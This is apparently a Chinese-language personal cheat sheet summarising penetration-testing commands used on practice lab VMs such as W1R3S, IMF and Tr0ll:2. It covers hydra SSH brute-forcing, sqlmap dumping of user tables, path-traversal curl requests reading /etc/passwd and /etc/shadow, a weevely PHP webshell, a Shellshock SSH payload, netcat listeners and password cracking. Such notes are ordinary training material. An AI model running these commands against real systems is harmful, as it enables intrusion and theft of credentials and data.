2020年1月12日 阶段总结
工具
文章目录
nmap
nmap -sP 192.168.31.0/24
-sP开关(Arp ping)执行PING命令,扫描IP段开启的主机
nmap -sS -sV -T5 -A -p- 192.168.31.69
-sS :半开放扫描(非3次握手的tcp扫描),它不打开一个完全的TCP连接,执行得很快,效率高
-sV:版本检测(sV),用来扫描目标主机和端口上运行的软件的版本
-A: -A综合扫描,包括系统探测,版本探测,脚本扫描,路由跟踪
-T: 时间优化(0-5)(paranoid|sneaky|polite|normal|aggressive|insane)
-p-: 从端口1扫描到65535
dirb
目录爆破工具
dirb http://192.168.31.69 -X .php,.txt,.zip,.html
dirb http://192.168.31.69
hydra
密码爆破工具
hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.31.69 -s 55006 pop3
使用user.txt用户名,fasttrack.txt密码字典对 55006端口进行爆破
hydra -l michael -P /usr/share/wordlists/rockyou.txt ssh://192.168.31.78 -t 4 #爆破ssh密码
netcat
nc 192.168.31.69 55007 #访问端口
nc -lnvp 1234 #监听端口
传输文件:
nc -l -p 4444>derp.pcap #接收端
nc 192.168.31.77 4444 < derpissues.pcap #发送端 31.77是目的地址
python
python -c 'import pty; pty.spawn("/bin/bash")' #获取tty
python -m SimpleHTTPServer 5678 #开启一个http服务
wget http://192.168.31.77:5678/37292.c #下载文件
wpscan
web漏洞扫描工具,
wpscan --url http://192.168.31.78/wordpress
wpscan --url http://192.168.31.78/wordpress/ --enumerate u #扫描用户
wpscan --url 'http://derpnstink.local/weblog/' --api-token xxxxxxx #现在需要 api-token
cewl
通过爬行网站获取关键信息创建一个密码字典
cewl http://192.168.145.148:1898/?q=node/1 -w pass.txt
sqlmap
sqlmap -u 'http://192.168.31.95:1337/978345210/index.php' --forms --dbs --risk=3 --level=5 --threads=4 --batch #收集数据库
sqlmap -u 'http://192.168.31.95:1337/978345210/index.php' --forms -D Webapp --tables --risk=3 --level=5 --threads=4 --batch #收集数据表
sqlmap -u 'http://192.168.31.95:1337/978345210/index.php' --forms -D Webapp -T Users --columns --risk=3 --level=5 --threads=4 --batch #收集字段
sqlmap -u 'http://192.168.31.95:1337/978345210/index.php' --forms -D Webapp -T Users -C id,username,password --dump --batch #收集数据
curl
curl是一个命令行工具,可用于在网络上传输数据。
它支持许多现成的协议,包括HTTP,HTTPS,FTP,FTPS,SFTP,IMAP,SMTP,POP3等。
在调试网络请求时,curl是您可以找到的最佳工具之一
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.31.11/administrator/alerts/alertConfigField.php #出现在靶机W1R3S
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.31.11/administrator/alerts/alertConfigField.php
weevely
weevely generate jesse biu.php #生成php文件,出现在靶机IMF
weevely http://192.168.31.233/imfadministrator/uploads/7652164f4a67.gif jesse #利用 weevely链接木马
fcrackzip
破解压缩包的密码
fcrackzip -u -D -p out.txt lmao.zip
john
开膛手john 破解密码
john pass.hash --wordlist =/usr/share/wordlists/rockyou.txt
john pass.hash --show
MSF
WireShark
常用 wireshark 分析pcap文件
Burpsuite
常用方法
使用域名访问
修改 /etc/hosts文件
MySql数据库
一般在 /var/www/html/网站/ 下会找到mysql的配置文件
mysql
mysql -u root -p #登录数据库
show databases #显示数据库
use xxxx数据库 #选择使用的数据库
show tables #显示表
select * from 表 #显示数据
select version() #查看数据版本
ps aux | grep root,查看到当前以root用户身份运行的所有进程。
gcc编译
gcc -g -c 1518.c
gcc -g -shared -o biu.so 1518.o -lc
-g 生成调试信息
-c 编译(二进制)
-shared:创建一个动态链接库,输入文件可以是源文件、汇编文件或者目标文件。
-o:执行命令后的文件名
-lc:-l 库 c库名
FTP登录
ftp 192.168.31.80
ftp 允许使用匿名登录时可以直接使用anonymous 登录
SSH登录
ssh user@192.168.31.80
ssh noob@192.168.31.124 -i noob -t "() { :; }; /bin/bash" #利用外壳拿登录权限 靶机:Tr0ll:2
ssh -i key.txt stinky@192.168.31.147 #使用密钥登录
file
file filename #使用file查看文件类型
端口碰撞
nmap -r -Pn -p 1,2,3 192.168.31.95 #出现在靶机LordOfTheRoot
knock敲门
靶机:IMF
提权方法
利用 cms或网站漏洞提权
使用google搜索 cms版本存在的漏洞
靶机:GoldenEye,Raven1,Lampiao,W1R3S ,DerpNStink
利用系统版本漏洞提权
使用google 直接搜索系统版本
靶机:Tr0ll:1,LordOfTheRoot
利用缓冲区溢出提权
靶机:LordOfTheRoot,IMF,Tr0ll:2
利用数据库漏洞提权
靶机:LordOfTheRoot